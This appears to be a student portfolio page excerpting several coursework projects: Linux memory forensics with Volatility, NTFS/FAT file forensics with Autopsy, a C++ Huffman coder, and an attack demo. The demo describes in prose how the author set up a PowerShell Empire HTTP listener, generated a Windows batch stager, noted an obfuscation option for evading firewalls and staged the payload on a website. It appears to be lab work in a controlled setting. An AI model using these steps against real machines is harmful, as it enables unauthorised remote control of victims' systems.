Coming soon

Analyzing Volatile Memory in Linux Systems

Using Volatility 2: A Forensic Approach

View in PDF

Abstract:

 

The purpose of this project is to leverage the potency of security and file forensic tools in performing dynamic analysis of potential cybersecurity threats. In this project, we will intentionally infect a controlled PC environment with various forms of malware and analyze the memory dump, and possibly files, to study the traces and signs left by the attacks. Our primary tool for this dynamic analysis will be Volatility, operating in a Linux environment. This project aims to provide a comprehensive view of threat detection and defense mechanisms by studying real-world attack vectors and their impact on system memory and files.

 

Introduction:

 

As digital reliance grows, so do cyber threats, necessitating strong defense mechanisms. Memory forensics, which involves analyzing computer memory dumps, plays a crucial role in unveiling these threats.

Memory forensics offers valuable information about a system's state at the time of the memory dump, allowing investigators to track malware or attacker actions. In this project, we'll delve into memory forensics, using security and file forensic techniques to detect attacks.

We will create a controlled environment, intentionally infecting an Ubuntu virtual machine with malicious programs via Metasploit console, and then analyze the system's memory dump and files using Volatility framework for dynamic analysis.

The project demands understanding of Linux memory and file system properties, malware analysis research, and proficiency with security and forensic tools as the project's goal is to bolster cybersecurity by analyzing traces left by different malware types on a system's memory and files.

 

Click of the View in PDF button to read more...

 

Video demonstration:

Coming Soon!

Cyber Security Vulnerabilities: Malware

View in PDF

My Scope: Attack Demo

 

For the attack in Power Shell Empire I typed Listeners then selected option Use listener, HTTP and enter. A menu appears with options that can be set for the Listener. I set a custom pot for communication 4321, this is where the data from the Agent will go. I gave a custom name to the listener calling it csci400, so it will be easier to know which listener I was working with. I have other listeners in my Empire because I have done more testing before I filmed it.

A new listener was created with the attacker IP address (internal IP, the victim is connected to the same router. This way I don’t have to set port forwarding in my router). Next, I selected a module I will be using by typing the command Usestager, Windows_Launcher_bat, and hitting enter.

An information about the module is displayed, like language used and type and name of the file that will be generated. I can select some options I want to use like set Obfuscate to True. This will add extra stealth and decrease the change of firewall blocking it. However, I will not be doing this because I want the process to be easy and transparent for the demo.

I chose my csci400 listener to be used with the module with Set listener command, I do not need to set anything else, so I type Execute and hit enter. The module was executed successfully, and the file was generated. Empire writes the file into the module directory, so I moved it into another directory where I will be using it with my website.

 

Click of the View in PDF button to read more...

 

PowerPoint presentation preview:

Download the PowerPoints

Demo of the file encrypting program:

File Forensics on Windows 10 FAT and NTFS File Systems using The Sleuth Kit (Autopsy Wrapper)

View in PDF

Introduction

 

In this project, we will learn about file systems and malware forensics, and the process of identifying and extracting digital artifacts from a hard disk within the NTFS file system. The experimentations will be done using a disc image created with the FTK Imager program in E 01 format and analyzed with the help of Autopsy version 4.2, a GUI wrapper for the Sleuth Kit. The main objective of this project is to demonstrate the process of data analysis and evidence extraction using file forensic tools as well as to compare different file systems with a focus on NTFS. In addition, we will go over some types of malware and the artifacts they potentially leave on the victim's machine.

 

Knowledge

 

2.1 File Systems.

A file system is, according to the SysDev Laboratories article (2022) a structure of how data is stored, organized, retrieved, and managed in a computer system, that operated on storage blocks, which are groups of sectors that allow for addressing optimization. The tasks of a file system are to keep track of logs. The FS logs things like which storage sectors are currently used and which are empty, and file information like size and name. The file system also manages files that are being stored in different sectors on the disk (storage fragmentation) in addition to managing block size, file descriptors, directories, and other attributes. There are various file system types, depending on the requirements of the users some may be more desirable than others. Below are some common file systems based on information published by Free Code Camp (Lavarian, 2022) and SysDev articles (2022):

  • New Technology File System (NTFS) the current default file system for Windows operating systems.
  • File Allocation Table (FAT) predecessor of NTFS, used as a default file system in early Windows and MS-DOS.
  • Extended File System (EXT) widely used in Linux-based systems.
  • XFS file system used in Linux, provides a great I/O performance and is, therefore, suitable for big data processing that is implemented in large-scale storage systems.  
  • Apple File System (APFS) created by Apple for macOS, iOS, tvOS, and watchOS. The successor of HFS+ with improved performance regarding space sharing, cloning, snapshots, and encryption.
  • Hierarchical File System Plus (HFS+) is the default file system used in macOS and Mac OS X. Supports large file sizes, Unicode, and journaling.

These are just a few examples of file systems tailored for different operating systems. Numerous others exist. However, our analysis will concentrate on comparing the NTFS file system to its predecessor, FAT, as our investigation will be conducted using the NTFS file system.

 

2.2 Comparison of NTFS and FAT systems.

2.2.1 History of both systems.

FAT12, (King, 2023) introduced in 1977 for MS-DOS, had a 12-bit wide file allocation table. It was succeeded by FAT16 in 1984 with MS-DOS 3.0, supporting larger hard disk sizes and a 16-bit allocation table. FAT32, launched in 1996, became the default file system in Windows 95, offering improved space utilization and file name lengths up to 255 characters. FAT is still used for compatibility purposes in various applications and devices.

NTFS was introduced in 1993 for Windows NT 3.1. (King, 2023) it offers enhanced performance, recoverability, and security. With journaling, encryption, and permissions, it supports larger volumes and file sizes. Subsequent versions introduced compression, space utilization improvements, distributed link tracking, disk quotas, and better scalability. NTFS 3.1, the current default for Windows OS, was released in 2001.

2.2.2 Main differences between the FAT and NTFS.

According to articles from Microsoft Learn documentation for those file systems (Deland-Han, 2021) and articles from EaseUS (King, 2023) the following differences between both systems were observed:

  • FAT does not support journaling, making it more susceptible to data corruption.           
  • NTFS supports files of size up to 16 EiB and volume sizes up to 256 TiB compared to
  • FAT32's maximum file size of 4 GiB and volume size of 32 GiB.             NTFS supports
  • security features like file and folder permissions, encryption, and auditing. FAT does not.
  • FAT uses a bigger cluster size making it less efficient in disk space utilization. 
  • NTFS supports various advanced features like hard links, symbolic links, alternate data streams, and volume shadow copies. FAT does not.
  • FAT provides much more compatibility due to its simplicity than NTFS.

 

2.3 Key components of NTFS.

NTFS has a more sophisticated structure than FAT, offering various advantages and some limitations. Key components of NTFS, as described by Microsoft Learn (Microsoft, 2009), include:

Journaling, which maintains consistency and enables recovery from system crashes or power failures.

Master File Table (MFT), is a database containing records for every file and directory on the partition.

Compression, which saves disk space by reducing file sizes. Hard links and junction points, enable multiple file names to reference the same data or directory. Partition Boot Sector, containing essential file system information. Clusters and Data Runs, organizing disk space and storing file data. Metadata Files, storing critical file system information. Access Control and Security, providing granular access control, encryption, and auditing. Large file and volume support, accommodating modern storage requirements and future scalability. Distributed Link Tracking (DLT), enables applications to track linked objects across NTFS volumes. Sparse files, allowing files with large empty areas that do not consume disk space. Alternate Data Streams (ADS), store additional data or metadata alongside primary file data but can be exploited by malware to hide data or code.

 

 

Click of the View in PDF button to read more...

 

Video demonstration:

Coming Soon!

A simple Huffmann Coding implementation in C++

View in PDF

Scope:

A simple program that accepts any string of text entered by the user. The output is a list of each character in the text and its Huffman code. 

 

Background:

Huffman encoding is an algorithm used for a lossless data compression by assigning binary codes to represent characters calculated based on their frequency in given input.

To implement Huffmann encoding in C++ a heap data structure can be used. For example, min-heap or priority queue can be utilized to recursively merge two characters starting from the least frequencies until all characters are merged and form a complete tree. The greedy method can be achieved by starting the merge from the least frequent characters and merging them, so that the most frequent character is the closest to the root using heapify.

 

Introduction:

The program below implements the Huffman encoding in a simple way, without using any library function to get codes. This program consists of only a few classes Node, Tree, and huffmannMethod, that are designed to compress a given input string by assigning binary codes to each character, based on their frequency in the input string and give code values for each character as the output. The accuracy is tested using a decode method.

 

Methodology:

        To achieve the objective of this assignment following steps were done:

  • Calculate the frequency of each character.
  • Sort the characters by frequency.
  • Build a tree based of characters frequency.
  • Traverse the tree and assign the Huffman codes
  • Check with decode method for accuracy.

 

Click of the View in PDF button to read more...

Video demonstration:

Coming Soon!